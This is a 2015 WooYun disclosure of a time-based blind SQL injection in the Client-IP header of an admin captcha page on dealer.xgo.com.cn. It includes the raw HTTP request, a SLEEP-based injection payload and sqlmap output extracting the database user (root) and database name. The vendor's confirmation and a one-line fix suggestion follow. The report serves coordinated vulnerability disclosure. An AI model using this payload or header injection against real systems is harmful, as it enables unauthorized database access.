当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133150

漏洞标题:汽车点评某站存在SQL盲注

相关厂商:xgo.com.cn

漏洞作者: 星明月稀

提交时间:2015-08-10 18:10

修复时间:2015-09-25 09:16

公开时间:2015-09-25 09:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-11: 厂商已经确认,细节仅向厂商公开
2015-08-21: 细节向核心白帽子及相关领域专家公开
2015-08-31: 细节向普通白帽子公开
2015-09-10: 细节向实习白帽子公开
2015-09-25: 细节向公众公开

简要描述:

汽车点评某站存在SQL盲注

详细说明:

注入点:

GET /d_admin/checkcodeimg.php HTTP/1.1
Host: dealer.xgo.com.cn
Client-IP: *


Client-IP 存在时间盲注

漏洞证明:

放到sqlmap
user: 'root'@'192.168.50.65' ROOT权限!

[17:32:37] [INFO] resuming back-end DBMS 'mysql' 
[17:32:37] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))NNPs) AND 'RfGj'='RfGj
---
[17:32:37] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[17:32:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[17:32:37] [INFO] fetching database users
[17:32:37] [INFO] fetching number of database users
[17:32:37] [WARNING] time-based comparison requires larger statistical model, please wait.............................               
[17:32:45] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[17:32:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
1
[17:32:54] [INFO] retrieved: 'root'@'192.168.50
[17:39:40] [ERROR] invalid character detected. retrying..
.6
[17:40:51] [ERROR] invalid character detected. retrying..
5'
database management system users [1]:
[*] 'root'@'192.168.50.65'
[17:41:29] [INFO] fetched data logged to text files under '/root/.sqlmap/output/dealer.xgo.com.cn'


current-db: 'xgo_dealer'

[17:49:15] [INFO] parsing HTTP request from 'httpreqTest/dealer.xgo.com.cn-wvs.txt'
[17:49:15] [INFO] loading tamper script 'space2comment'
custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] 
[17:49:17] [INFO] resuming back-end DBMS 'mysql' 
[17:49:17] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ' AND (SELECT * FROM (SELECT(SLEEP(10)))NNPs) AND 'RfGj'='RfGj
---
[17:49:17] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[17:49:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[17:49:17] [INFO] fetching current database
[17:49:17] [WARNING] time-based comparison requires larger statistical model, please wait.............................               
[17:49:24] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[17:49:34] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
x
[17:51:05] [ERROR] invalid character detected. retrying..
go_dealer
current database:    'xgo_dealer'
[17:57:24] [INFO] fetched data logged to text files under '/root/.sqlmap/output/dealer.xgo.com.cn'

修复方案:

过滤或者转义

版权声明:转载请注明来源 星明月稀@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-08-11 09:14

厂商回复:

感谢,已经安排修复

最新状态:

暂无

漏洞评价:

评论